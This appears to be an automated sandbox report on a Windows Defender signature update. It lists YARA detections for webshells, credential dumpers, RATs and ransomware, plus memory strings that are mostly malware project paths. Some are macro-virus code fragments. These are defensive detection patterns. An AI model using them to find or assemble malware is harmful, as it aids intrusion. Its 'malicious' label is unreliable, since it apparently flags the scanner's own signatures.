    Source: 00000023.00000003.6399846790.0000028BD6EA1000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
    Source: 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
    Source: 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp, type: MEMORYMatched rule: webshell_php_by_string_known_webshell date = 2021/01/09, author = Arnim Rupp, description = Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 7b6471774d14510cf6fa312a496eed72b614f6fc
    Source: 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp, type: MEMORYMatched rule: Oilrig_IntelSecurityManager date = 2018-01-19, author = Eyal Sela, description = Detects OilRig malware, reference = Internal Research
    Source: 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTRMatched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTRMatched rule: Msfpayloads_msf_psh date = 2017-02-09, hash1 = 5cc6c7f1aa75df8979be4a16e36cece40340c6e192ce527771bdd6463253e46f, author = Florian Roth, description = Metasploit Payloads - file msf-psh.vba, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTRMatched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTRMatched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTRMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTRMatched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTRMatched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR, Matched rule: Keylogger_CN_APT date = 2016-03-07, author = Florian Roth, description = Keylogger - generic rule for a Chinese variant, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 3efb3b5be39489f19d83af869f11a8ef8e9a09c3c7c0ad84da31fc45afcf06e7
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR, Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR, Matched rule: REDLEAVES_CoreImplant_UniqueStrings author = USG, description = Strings identifying the core REDLEAVES RAT in its deobfuscated state, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR, Matched rule: PLUGX_RedLeaves date = 2017-04-03, author = US-CERT Code Analysis Team, MD5_5 = 566291B277534B63EAFC938CDAAB8A399E41AF7D, description = Detects specific RedLeaves and PlugX binaries, MD5_1 = 598FF82EA4FB52717ACAFB227C83D474, MD5_2 = 7D10708A518B26CC8C3CBFBAA224E032, MD5_3 = AF406D35C77B1E0DF17F839E36BCE630, MD5_4 = 6EB9E889B091A5647F6095DCD4DE7C83, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, incident = 10118538
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR, Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR, Matched rule: WindowsCredentialEditor threat_level = , description = Windows Credential Editor
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR, Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR, Matched rule: HackTool_Samples description = Hacktool, score =
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR, Matched rule: Ammyy_Admin_AA_v3 date = 2014/12/22, hash2 = 07539abb2623fe24b9a05e240f675fa2d15268cb, author = Florian Roth, description = Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe, reference = http://goo.gl/gkAg2E, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = b130611c92788337c4f6bb9e9454ff06eb409166
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR, Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR, Matched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR, Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR, Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR, Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR, Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR, Matched rule: IronPanda_Malware_Htran date = 2015-09-16, author = Florian Roth, description = Iron Panda Malware Htran, reference = https://goo.gl/E4qia9, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 7903f94730a8508e9b272b3b56899b49736740cea5037ea7dbb4e690bcaf00e7
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR, Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR, Matched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = file
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR, Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR, Matched rule: HackTool_MSIL_SharPersist_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 98ecf58d48a3eae43899b45cec0fc6b7
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR, Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR, Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR, Matched rule: ChinaChopper_Generic date = 2015/03/10, author = Florian Roth, description = China Chopper Webshells - PHP and ASPX, reference = https://www.fireeye.com/content/dam/legacy/resources/pdfs/fireeye-china-chopper-report.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR, Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR, Matched rule: vanquish_2 author = Yara Bulk Rule Generator by Florian Roth, description = Webshells Auto-generated - file vanquish.exe, hash = 2dcb9055785a2ee01567f52b5a62b071
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR, Matched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR, Matched rule: APT9002Strings author = Seth Hardy, description = 9002 Identifying Strings, last_modified = 2014-06-25
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR, Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
    Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR, Matched rule: MirageStrings author = Seth Hardy, description = Mirage Identifying Strings, last_modified = 2014-06-25
    Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe, File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4
    Source: mpavdlta.vdm.34.dr, Static PE information: No import functions for PE file found
    Source: mpavbase.vdm.35.dr, Static PE information: No import functions for PE file found
    Source: mpasbase.vdm.35.dr, Static PE information: No import functions for PE file found
    Source: mpasdlta.vdm.34.dr, Static PE information: No import functions for PE file found
    Source: C:\Windows\System32\wevtutil.exe, Process token adjusted: Security
    Source: mpasdlta.vdm.34.dr, Static PE information: Section: .rsrc ZLIB complexity 0.999074201542
    Source: mpavdlta.vdm.34.dr, Static PE information: Section: .rsrc ZLIB complexity 0.996293048469
    Source: classification engine, Classification label: mal100.rans.spre.troj.spyw.expl.evad.mine.winEXE@12/14@4/3
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpBinary or memory string: J@*\AE:\RE9FA3~1\BUG_1_~1\XXXXXX~1.VBP
    Source: MpSigStub.exe, 00000023.00000003.6336769092.0000028BD7D54000.00000004.00000001.sdmpBinary or memory string: .+Yakoza\\server\\Project1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmpBinary or memory string: 6:\VB\own\ZB\ss\Project1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpBinary or memory string: A*\AC:\Documents and Settings\HailuYa.ETHAIR\Desktop\pass\asterie.vbp
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpBinary or memory string: F:\prog lang\visual basic\edu\hack\key logger\EgySpy v1.11\server\EgySpy.vbp
    Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmpBinary or memory string: LD:\Master\bb_soft\n_07_10_2008\dll.vbp
    Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmpBinary or memory string: UPD:\\(BitComet|BingDun|3D Driving-School)\\[a-zA-Z0-9]{10,30}\\(builder|ad)\.vbp
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpBinary or memory string: \ffzefzefz.vbp
    Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmpBinary or memory string: C:\\.*A.*\\B\\Base.vbp
    Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmpBinary or memory string: :5C:\\Users\\GavaLarr\\Desktop\\Windows\\prjSchool.vbp
    Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmpBinary or memory string: LD:\Master\bb_soft\n_13_10_2008\dll.vbp
    Source: MpSigStub.exe, 00000023.00000003.6328555317.0000028BD68B2000.00000004.00000001.sdmpBinary or memory string: sload.vbp
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpBinary or memory string: %.com\Project1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpBinary or memory string: E@.+:\\Users\\box1\\Downloads\\SoUnd-.+-2011\\[0-9]{3,16}\\.+.vbp
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpBinary or memory string: :\PassStealer 3.0\Projekt1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpBinary or memory string: bTOYANO\otros virusillos\shell32\devil shell32.vbp
    Source: MpSigStub.exe, 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmpBinary or memory string: \GetIPAddresListFromHost\ForRobot\IPv6Chat.vbp
    Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmpBinary or memory string: RMC:\\Documents and Settings\\BUNNN\\My Documents\\vb\\Yahoo Spy.+Project1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmpBinary or memory string: @.vbp
    Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmpBinary or memory string: E:\\.+\\2010\\baidu.vbp
    Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmpBinary or memory string: C:\winapp.vbp
    Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmpBinary or memory string: 2\folder_x\File Folder.vbp
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpBinary or memory string: 4/.+:\\.+\\Stctr\\.+\\ZynExplore\\ZynExplore.vbp
    Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmpBinary or memory string: \ardCo011064.vbp
    Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmpBinary or memory string: \WinSysFix_1.5.vbp
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpBinary or memory string: \po\Cdmator.vbp
    Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmpBinary or memory string: *z:\ultimate\casa.vbp]
    Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmpBinary or memory string: $\WEBPNT\weBpnt.VBp
    Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmpBinary or memory string: \WebNav.vbp
    Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmpBinary or memory string: .+:\\Obfuscated.*\\unapubvelr.vbp
    Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmpBinary or memory string: .+:\\.+\\Kraken\\Escritorio.+\\descarga\\Project1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmpBinary or memory string: Serega\Project1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmpBinary or memory string: B=.+:\\.+\\rkmVirus\\Yahoo Server\\.+\\rkmVirusYahoo.*\\.+.vbp
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpBinary or memory string: A<C:\\WINDOWS\\system32\\config\\systemprofile\\.+\\Noway.vbp
    Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmpBinary or memory string: PharOlniNe\Proyecto1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpBinary or memory string: rypter\stub.vbp]
    Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmpBinary or memory string: F*\AE:\sharK\2.2\Server\Projekt1.vbpd[
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpBinary or memory string: PD:\Master\bb_soft\bb_loader\Project1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpBinary or memory string: \Project1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmpBinary or memory string: .+:\\Documents and Settings\\User\\Desktop\\.*pia de.*fab\\Project1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmpBinary or memory string: :\Users\jpvic\Desktop\VB6DLL\PROFULL_NODLL_SPLIT_AND_RES\Project1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmpBinary or memory string: z1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Microsoft Visual Studio\VB98\pjtAwsVariantioner.vbp
    Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmpBinary or memory string: vbSendMail.vbp
    Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmpBinary or memory string: 0Desktop\war\Project1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmpBinary or memory string: vC:\Program Files\Microsoft Visual Studio\VB98\pjtbinder.vbp
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpBinary or memory string: Final RS Stealer\Project1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmpBinary or memory string: 1,.+:\\.+\\Desktop\\Yeni Klas.+\\Project1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmpBinary or memory string: SN.+\\(BotSupho Compiler|BotSupHo\\.+?\\Server(new)?)(\\Server)?\\Project2\.vbp
    Source: MpSigStub.exe, 00000023.00000003.6333995743.0000028BD75DA000.00000004.00000001.sdmpBinary or memory string: \Asterios\Heriposter.vbpxe
    Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmpBinary or memory string: '"\\Explorador-Remoto\\Servidor.vbp
    Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmpBinary or memory string: Dicionario.vbp
    Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmpBinary or memory string: \ADWARA\prjX.vbp
    Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmpBinary or memory string: .+:\\trampo novo.*\\.+\\Loader_DLL_OUT_GORDO\\TP_Auto.vbp
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpBinary or memory string: B=.+\\installscash nno form wow downloader\\mycc\\Project1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmpBinary or memory string: `D:\Master\bb_soft\n_07_10_2008\bb_bho\VBBHO.vbp
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpBinary or memory string: .+\\Viruses\\Black Project\\Dark_Love.vbp
    Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmpBinary or memory string: *\AD:\Software\Hacking Tools\DDOS tools\STRESS\BBHH-DoS\Project1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmpBinary or memory string: \\Laboratorio de Virus\\WinXP\\Downloader.vbp
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpBinary or memory string: ao com erro\PrjMain.vbp
    Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmpBinary or memory string: mt Download .vbp
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpBinary or memory string: C:\\WINDOWS\\system32\\config\\systemprofile\\.+\\Noway.vbp
    Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmpBinary or memory string: Ourcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)
    Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmpBinary or memory string: ,z:\abc\load\kombi.vbpxM
    Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmpBinary or memory string: PE:\Coba Software\Virus\BRR\MOTTO_BRR.vbp
    Source: MpSigStub.exe, 00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmpBinary or memory string: @\Project1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmpBinary or memory string: D:\\(BitComet|BingDun|3D Driving-School)\\[a-zA-Z0-9]{10,30}\\(builder|ad)\.vbp
    Source: MpSigStub.exe, 00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmpBinary or memory string: 8Business\Kitty Logger\KL.vbp]
    Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmpBinary or memory string: ?:.+:\\trampo novo.*\\.+\\Loader_DLL_OUT_GORDO\\TP_Auto.vbp
    Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmpBinary or memory string: ..\Desktop\Startup\Bitar.vbpxN
    Source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmpBinary or memory string: .+:\\.+\\fuckADX\\.+\\ADs.*\\Project1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmpBinary or memory string: :D:\Master\bb_soft\new\dll.vbp
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpBinary or memory string: F*\AD:\Junk Programs\Test_Passw20243252017\TestPwd\TestPwd.vbp
    Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmpBinary or memory string: 2Crypt3r\demonio666vip.vbp
    Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmpBinary or memory string: P\AYO.vbp
    Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmpBinary or memory string: .+:\\afron\\Loader.*VB.+\\Project1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmpBinary or memory string: \Pack.vbp
    Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmpBinary or memory string: \loaderFirefox.vbp
    Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmpBinary or memory string: C:\\Xinfiltrate STUB\\[a-zA-Z]{3,20}.vbp
    Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmpBinary or memory string: .+:\\.+\\rkmVirus\\Yahoo Server\\.+\\rkmVirusYahoo.*\\.+.vbp
    Source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmpBinary or memory string: C:\Arquivos de programas\Microsoft Visual Studio\VB98\Projetos.frm\Flame Kill\Project1.vbp
    Source: MpSigStub.exe, 00000023.00000003.6301785848.0000028BD7C0A000.00000004.00000001.sdmpBinary or memory string: papnsappsapusap5tap[yapmyapgabpagbptubp.vbp.wbpu.cpo_cprecpvicp
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpBinary or memory string: \KDWIN\KDWin.vbp
    Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmpBinary or memory string: .VBProject.VBComponents(1).CodeModule.deletelines
    Source: MpSigStub.exe, 00000023.00000003.6279726781.0000028BD6C0C000.00000004.00000001.sdmpBinary or memory string: \C:\ZKing8\WinZ\WSP\RenoNevada\FTPREM\MyFTP.vbp
    Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmpBinary or memory string: Pinball.vbp
    Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmpBinary or memory string: \WINDOWS.VBP]
    Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmpBinary or memory string: &\SelectCaseEnum.vbp
